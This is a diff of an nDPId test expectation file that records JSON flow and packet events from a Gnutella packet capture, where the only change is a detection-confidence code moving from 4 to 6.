00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64031,"flow_last_seen":64031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64031,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -170,10 +170,10 @@ 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":64213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64213,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoApQAAP8Gwb497q2ACgACD+EwxBoAAAAAK91tIlAUAAB6CAAA"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":64275,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64275,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApUAAEAGjec93qBjCgACD0oyxBsAZ4QBK6ojSGAS\/\/\/MHQAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":64276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64276,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocDVAAIAGoEoKAAIPPd6gY8QbSjIrqiNIAGeEAlAQ+vDo6QAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64031,"flow_last_seen":64276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":64276,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64031,"flow_last_seen":64276,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":64276,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":64291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64291,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApcAAEAGH32vtZz0CgACDyA\/xB4AaH4BbaXa1mAS\/\/+UGgAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":64291,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64291,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoyBJAAIAG2gQKAAIPr7Wc9MQeID9tpdrWAGh+AlAQ+vCw5gAA"} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64032,"flow_last_seen":64291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":64291,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64032,"flow_last_seen":64291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":64291,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":64717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZlAAIAG6a0KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} 
00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65061,"flow_last_seen":65061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65061,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":65061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65061,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q8tAAIAGVuYKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} 
@@ -189,12 +189,12 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":65063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65063,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWpAAIAG8s4KAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":0,"thread_ts_msec":65065,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":65065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADS4KkAAAER3GgKAAIP7\/\/\/+uEXB2wAvizBTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToyDQpNWDogMw0KDQo="} 
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":0,"thread_ts_msec":65065,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65065,"flow_last_seen":65065,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":0,"thread_ts_msec":65065,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":57623,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":65065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADS4KoAAAER3GcKAAIP7\/\/\/+uEXB2wAvi3BTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNWDogMw0KDQo="} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":65065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":65065,"pkt":"AQBef\/\/6CAAn5uVZCABFAADN4KsAAAER3GsKAAIP7\/\/\/+uEXB2wAuZDETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClVTRVItQUdFTlQ6IGd0ay1nbnV0ZWxsYS8xLjIuMiAoMjAyMi0wMi0yNSkNCk1BTjogInNzZHA6ZGlzY292ZXIiDQpTVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpXQU5JUENvbm5lY3Rpb246Mg0KTVg6IDMNCg0K"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":65240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":65240,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAp8AAEAGUxwOxwo8CgACD1uixCMAa2wB\/Z82JWAS\/\/+zDQAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":65241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":65241,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSFFAAIAGjW0KAAIPDscKPMQjW6L9nzYlAGtsAlAQ+vDP2QAA"} 
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":65062,"flow_last_seen":65241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":65241,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":65062,"flow_last_seen":65241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":65241,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xttAAIAGndgKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} 
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1tAAIAGzIQKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":66017,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":66017,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iq1AAIAGH9UKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} 
@@ -248,7 +248,7 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":68170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68170,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0k7pAAIAGcS8KAAIPJOnE4sQsDuwTBJqfAAAAAIAC+vD9iAAAAgQFtAEDAwgBAQQC"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":68368,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":68368,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAqgAAEAGVIJ08aKiCgACDz09xDIAcUgB9bSpG2AS\/\/+LwQAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":68368,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68368,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobmNAAIAGaMoKAAIPdPGiosQyPT31tKkbAHFIAlAQ+vCojQAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":68108,"flow_last_seen":68372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":68372,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":68108,"flow_last_seen":68372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":68372,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":68425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":68425,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAqoAAP8GHcZv8R9gCgACDzgwxDQAAAAAU1SN+lAUAAA2vQAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":68935,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":68935,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KIpAAIAGNtoKAAIPb\/EfYMQ0ODBTVI35AAAAAIAC+vD7DAAAAgQFtAEDAwgBAQQC"} 
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":69076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69076,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdpAAIAGUVsKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} 
@@ -271,17 +271,17 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":69142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":69142,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lydAAIAGNGMKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":69169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69169,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAq8AAEAGhyBdHYfRCgACDxjKxDwAczwBOuMML2AS\/\/9GjAAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":69169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69169,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZ6tAAIAGoicKAAIPXR2H0cQ8GMo64wwvAHM8AlAQ+vBjWAAA"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":69174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69174,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":69174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.29.135.209","src_port":50236,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":69182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69182,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArEAAEAGyG4tWHZGCgACDxr6xDsAdDYBRmqi+GAS\/\/\/pWwAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":69182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69182,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoAgRAAIAGSR8KAAIPLVh2RsQ7GvpGaqL4AHQ2AlAQ+vAGKAAA"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":69182,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69142,"flow_last_seen":69182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":69182,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 